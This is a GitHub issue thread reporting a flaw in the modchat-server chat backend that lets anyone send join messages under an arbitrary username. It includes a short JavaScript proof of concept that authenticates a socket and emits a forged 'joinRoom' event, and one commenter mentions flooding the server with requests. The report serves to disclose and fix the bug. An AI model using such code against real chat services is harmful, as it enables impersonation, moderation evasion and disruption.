### ISSUE TITLE
Arbitrary join messages

### ISSUE THREAD

**Issue by AmazingMech2418** [micahlt/modchat-server#3]
Same as in #2 for getting access to the socket.

However, this bug allows you to put in any user for the join message, as shown below:
![image](https://user-images.githubusercontent.com/33498997/119270984-6f01a280-bbcd-11eb-9d6f-c5eede270241.png)

This is achieved by first gaining access to the socket.

Then, you must authenticate using this code:
```js
let that = {user:{name:JSON.parse(localStorage.getItem("user")).name
, password:JSON.parse(localStorage.getItem("user")).password,token:JSON.parse(localStorage.getItem("user")).token
}, currentRoom: "general"};
    socket.on("connect", () => {
      console.log('Connected to server');
      socket.emit('authentication', {
        username: that.user.name,
        password: that.user.password
      });
      console.log('Submitted auth');
      socket.on('authenticated', function() {
        console.log('Successfully authed');
        socket.emit("joinRoom", {
          "username": that.user.name,
          "roomname": that.currentRoom
        });
      });
    });
```

Then use this to connect the socket:
```js
socket.connect();
```

Now that the socket is connected, all you have to do is use a `socket.emit` message.
```js
socket.emit("joinRoom", {username:"amazingmech2418 hacked ModChat and ", roomname:"general"})
```

Another issue is that this essentially enables anonymous messaging and also, the ModChat Bot's messages are not filtered, allowing filter bypass without a way to know who to ban. 

Luckily though, this cannot be used for XSS.

**Comment by micahlt** [comment]
Solutions to this issue?

**Comment by AmazingMech2418** [comment]
Maybe adding authentication to join messages would work?

**Comment by ghost** [comment]
The solution to #4 should fix this.

**Comment by jessiejs** [comment]
lol, you dont even need to auth, and you can use it to slow modchat due to thousands of ocular requests

**Comment by micahlt** [comment]
@CodeLikeCrazE Please **don't** contribute unhelpful remarks like that.  It helps nobody.
